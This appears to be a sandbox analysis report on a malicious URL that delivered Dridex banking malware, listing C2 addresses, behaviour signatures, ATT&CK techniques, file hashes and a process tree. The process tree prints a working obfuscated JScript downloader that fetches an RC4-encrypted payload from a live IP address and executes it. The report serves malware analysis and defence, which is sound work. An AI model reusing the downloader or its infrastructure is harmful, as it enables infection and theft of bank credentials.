Overview

overview

10

Static

static

URLScan

urlscan

https://exitmagall.x...

windows7_x64

6

https://exitmagall.x...

windows10_x64

10

Analysis

  • max time kernel
    241s
  • max time network
    250s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    11-06-2021 13:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://exitmagall.xyz/iduew73

  • Sample

    210611-9qr8m4rems

Score
10/10
dridex10111botnetcryptonediscoveryevasionpackertrojan

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

91.200.186.229:19226

91.191.172.124:13783
rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

    botnetdridex
  • CryptOne packer 2 IoCs

    Detects CryptOne packer defined in NCC blogpost.

    cryptonepacker
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
    adwarespyware
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://exitmagall.xyz/iduew73
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:672
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:672 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1876
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://188.227.107.144/?MjU5NzQ4&fepsLcMVF&s2hdfgdfgt4=6NbP03YA0SD2Izfz-3ORZ3xOWPPk7HPRAOzrlyCegyC8_Auf7dVPwDnjUKHfwcyzYkPUVgSpKCsj0DTmBGdgpWCq0CNUQhE-KLIVLM46A&oafghc1n4=w33QMvXcJx3QFYPJKfncT&end=cars&start=why&yus=73uball.114al73.406i8h2w7&QfIGMTk0MTY=" "2""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2264
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://188.227.107.144/?MjU5NzQ4&fepsLcMVF&s2hdfgdfgt4=6NbP03YA0SD2Izfz-3ORZ3xOWPPk7HPRAOzrlyCegyC8_Auf7dVPwDnjUKHfwcyzYkPUVgSpKCsj0DTmBGdgpWCq0CNUQhE-KLIVLM46A&oafghc1n4=w33QMvXcJx3QFYPJKfncT&end=cars&start=why&yus=73uball.114al73.406i8h2w7&QfIGMTk0MTY=" "2""
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:2480
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c r437f.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3880
            • C:\Users\Admin\AppData\Local\Temp\r437f.exe
              r437f.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:3084

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    66e0a7c9b93a12e042f3d12e877443ba

    SHA1

    6c7d578b1c81595c64fa76c787228e7000572f6c

    SHA256

    80a2f7ce91f8fbd0c434679d8727b702b7829082298c872cba8a3aeca4ba91b7

    SHA512

    46fff32727988796daf825772043e2aaad9775fde03c4d00d80f92f69b3cc5e466fc94f2eb9197e2685439cbae3d845a6cbb999756533a36e4983f7a8491ebc6

    Download Submit
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    9033c21d07cc9ea27f60b54173f06b85

    SHA1

    41882568733f4c8c8db97209ff0b026f3e9e0239

    SHA256

    a8e88ba91e3c6db2caf7dce05072e529174e9904f64dada92c8339f0c3305e12

    SHA512

    7a590377185088ec6ee632b11004e92aa61b3f95bc47cdb88b1a11c4163ee93979d528bdd629003ab45ed41eefa73ad965bc4e83661f517456a04b42169388eb

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\G2YMFG32.cookie
    MD5

    c5a202fb2149ab569a03b26eae238b58

    SHA1

    071a2e45a0046e51272374082ce435c48caf49d7

    SHA256

    2feff3d84a8bddbd7e91bfda1f2a9eadc8c19a467a89b18fe34eedd2727d2757

    SHA512

    95e24b5bfc846c316b59a54c9d00a31a9ea943f9b669969ae5e8bf6bc345db0a49dbd55c0d07ae9208b6714bc91b7c030bb5c3c44602f69924e5b371aee79ad3

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\U41AKJKH.cookie
    MD5

    67c344ac5ab2b6ad7c8139840fcf26b2

    SHA1

    4ebb71891042ca2691a53fc5be26c09e3d9be412

    SHA256

    c91f041fdf2fb13e781d06f975b5110f9059de92b0d0e0eee6f838ce02d2eb2e

    SHA512

    41d355f39f503b78a852d044b809694d64b24e9b1bb385403e23b11ba72cff285e763c2739fdb1054b6e9a3e0d338330bd768b35dbbb3b0f16c32358c8c61164

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    60fc00422b399db85f87d41b8328976d

    SHA1

    bb85034acad8025f97e5bb236443debaf8926e4b

    SHA256

    c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

    SHA512

    16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\r437f.exe
    MD5

    4ec7ddfd82f4a621daade04123f4fda7

    SHA1

    dd7fa496a792e5efa4c96cc26aa5d6b2f7fda5b6

    SHA256

    ad8de0ffe7a79bd5a1bb949080ac4a20951944683b66ccf0547cca7dee96824c

    SHA512

    2124645a7e7aff5ad55315e17b99fdd9cdd3f239aba19aaa54c5547e099da9fe4090067620d2b5abcc17634d09b9754b02ddff700c22c5cb96451c243507cf56

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\r437f.exe
    MD5

    4ec7ddfd82f4a621daade04123f4fda7

    SHA1

    dd7fa496a792e5efa4c96cc26aa5d6b2f7fda5b6

    SHA256

    ad8de0ffe7a79bd5a1bb949080ac4a20951944683b66ccf0547cca7dee96824c

    SHA512

    2124645a7e7aff5ad55315e17b99fdd9cdd3f239aba19aaa54c5547e099da9fe4090067620d2b5abcc17634d09b9754b02ddff700c22c5cb96451c243507cf56

    Download Submit
  • memory/672-114-0x00007FF8E4290000-0x00007FF8E42FB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/1876-115-0x0000000000000000-mapping.dmp
    Download
  • memory/2264-116-0x0000000000000000-mapping.dmp
    Download
  • memory/2480-117-0x0000000000000000-mapping.dmp
    Download
  • memory/3084-120-0x0000000000000000-mapping.dmp
    Download
  • memory/3084-124-0x0000000000400000-0x0000000000595000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3084-123-0x00000000006D0000-0x000000000081A000-memory.dmp
    Filesize

    1.3MB

    Download
  • memory/3880-119-0x0000000000000000-mapping.dmp
    Download